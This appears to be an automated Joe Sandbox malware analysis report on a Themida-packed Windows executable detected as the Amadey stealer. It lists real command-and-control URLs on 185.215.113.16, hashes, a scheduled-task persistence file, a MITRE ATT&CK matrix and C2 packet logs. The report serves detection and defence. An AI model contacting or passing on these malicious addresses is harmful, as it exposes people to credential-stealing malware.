Source: axplong.exe, axplong.exe, 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: %Program Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 8_2_0027D312 cpuid

8_2_0027D312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 8_2_0027CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

8_2_0027CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2295538512.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2268543897.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2706394486.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2255300359.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2237964071.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2181826515.0000000005330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278205377.0000000000261000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	53%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	53%	ReversingLabs	Win32.Packed.Themida

Source	Detection	Scanner	Label
http://185.215.113.16/	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php	100%	Avira URL Cloud	malware
http://185.215.113.16/Jo89Ku7d/index.phpoM	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpYlu	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php-k	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpncodedb	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php)	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpE	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpi	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php2l	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php~k	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpded	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpXkt	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpnlf	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.php5	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpike	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpu	100%	Avira URL Cloud	phishing
http://185.215.113.16/Jo89Ku7d/index.phpiQ	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
171.39.242.20.in-addr.arpa	unknown	unknown	false		unknown
86.23.85.13.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/Jo89Ku7d/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.16/	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php-k	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpncodedb	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpoM	axplong.exe, 00000008.00000002.3429938942.0000000000C80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php)	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpi	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php2l	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpE	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpYlu	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php~k	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpXkt	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpded	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpike	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.php5	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpiQ	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpu	axplong.exe, 00000008.00000002.3429938942.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/Jo89Ku7d/index.phpnlf	axplong.exe, 00000008.00000002.3429938942.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519481
Start date and time:	2024-09-26 15:40:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/3@2/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target axplong.exe, PID 5000 because there are no executed function
Execution Graph export aborted for target axplong.exe, PID 7112 because there are no executed function
Execution Graph export aborted for target file.exe, PID 3416 because it is empty
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
09:42:01	API Interceptor	566258x Sleep call for process: axplong.exe modified
15:41:14	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.16	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, Go Injector, XWorm	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	185.215.113.16/inc/newbundle2.exe
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16/Jo89Ku7d/index.php
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	185.215.113.16/inc/XM.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	185.215.113.117
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1943552
Entropy (8bit):	7.950508600013589
Encrypted:	false
SSDEEP:	24576:01nSsCcbDueckihHZoPoEwvv8XbPyg3nwuE3RW2ZeD4W0kTsrJMUK0m4PZMSG:uPlbH/ihHZoWMrlM3ZeDgkEPmWMSG
MD5:	CC58B885AC20A4B1CDC8E9174A6E8703
SHA1:	6083C47A6C956443DCA245AA136AF1BDE2630447
SHA-256:	3FE2E0B2D033BD7237B70928B032193BD7CB8F644A78E88DDB481C90721DB498
SHA-512:	5490A52189DB5EFADA9E54D4E89008F1D3EC38CBDE19A3C2177D14E6E69A22BB401D1EB2388D86B40ABBFE62C58888D2C4AECE73793F136D016CBD2E800053DB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@.......................... M...........@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...cyjncunv.....P2.....................@...zwriwafc......L.....................@....taggant.0....L.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	304
Entropy (8bit):	3.41388201938854
Encrypted:	false
SSDEEP:	6:kbyXlXUEZ+lX1lOJUPelkDdtE9+AQy0lbMt0:kbA1Q1lOmeeDs9+nVot0
MD5:	9D623F5AA5166C28B403AD8B3025D801
SHA1:	A024182AC5FB4070A0392E4D25749E0E7F1A71F1
SHA-256:	EE87024AEB4B1B8E885B06C9891BF4EFCD7FDB90FCF8DAFA60E971E5646E1C74
SHA-512:	054950120E2D8AFA4DDF72487D8C6E7F5F25B877F44B21DEA45CB02B3F40F94BEAA78E5343EC37C708F4938B3EC87E956F36E21FD3D308B55D1A22FC374793CE
Malicious:	false
Reputation:	low
Preview:	.....r1.i<.D. .].Dy.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................*.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950508600013589
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'943'552 bytes
MD5:	cc58b885ac20a4b1cdc8e9174a6e8703
SHA1:	6083c47a6c956443dca245aa136af1bde2630447
SHA256:	3fe2e0b2d033bd7237b70928b032193bd7cb8f644a78e88ddb481c90721db498
SHA512:	5490a52189db5efada9e54d4e89008f1d3ec38cbde19a3c2177d14e6e69a22bb401d1eb2388d86b40abbfe62c58888d2c4aece73793f136d016cbd2e800053db
SSDEEP:	24576:01nSsCcbDueckihHZoPoEwvv8XbPyg3nwuE3RW2ZeD4W0kTsrJMUK0m4PZMSG:uPlbH/ihHZoWMrlM3ZeDgkEPmWMSG
TLSH:	F4953347BAC33679D59404BD6A1272D07F605F6971CAEB28EF43EC2E68531180BB3C66
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8cf000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA22C66F8BAh
jbe 00007FA22C66F8D3h
add byte ptr [eax], al
jmp 00007FA22C6718B5h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], cl
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4cdb0c	0x10	cyjncunv
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4cdabc	0x18	cyjncunv
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	08043589a9842e3505e95340e402c5ab	False	0.9975412976839237	data	7.986737660676203	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	af019b2fc3d1c8173dd6ec327e902497	False	0.580078125	data	4.4894965334426225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2ba000	0x200	d34f1ce82d85beb4d192b6e99f356e0e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cyjncunv	0x325000	0x1a9000	0x1a8e00	a315ffa18c69612ee4bdb5f29271bbf1	False	0.9946675492791998	data	7.953951929244691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zwriwafc	0x4ce000	0x1000	0x400	d2599b3c632a11fb27d89fa5ec5045ca	False	0.7900390625	data	6.204233570717054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4cf000	0x3000	0x2200	87141142fe873d9058849b397387f1a6	False	0.0646829044117647	DOS executable (COM)	0.7540607977810064	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4cdb1c	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T15:42:34.422694+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	52348	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 15:42:02.713953018 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:02.719095945 CEST	80	52319	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:02.719199896 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:02.719383001 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:02.724486113 CEST	80	52319	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:03.542167902 CEST	80	52319	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:03.542377949 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.544769049 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.549756050 CEST	80	52319	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:03.781316042 CEST	80	52319	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:03.781383038 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.888513088 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.888875008 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.893737078 CEST	80	52320	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:03.893832922 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.894004107 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.895025969 CEST	80	52319	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:03.895092964 CEST	52319	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:03.898829937 CEST	80	52320	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:04.775163889 CEST	80	52320	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:04.775306940 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:04.776247978 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:04.781374931 CEST	80	52320	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:05.142745972 CEST	80	52320	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:05.142849922 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.247565031 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.247884035 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.252887964 CEST	80	52320	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:05.252981901 CEST	52320	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.253014088 CEST	80	52321	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:05.253103018 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.253216028 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.258680105 CEST	80	52321	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:05.976547956 CEST	80	52321	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:05.976666927 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.977672100 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:05.982745886 CEST	80	52321	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:06.215785027 CEST	80	52321	185.215.113.16	192.168.2.6
Sep 26, 2024 15:42:06.215920925 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:06.326556921 CEST	52321	80	192.168.2.6	185.215.113.16
Sep 26, 2024 15:42:06.326868057 CEST	52322	80	192.168.2.6	185.215.113.16
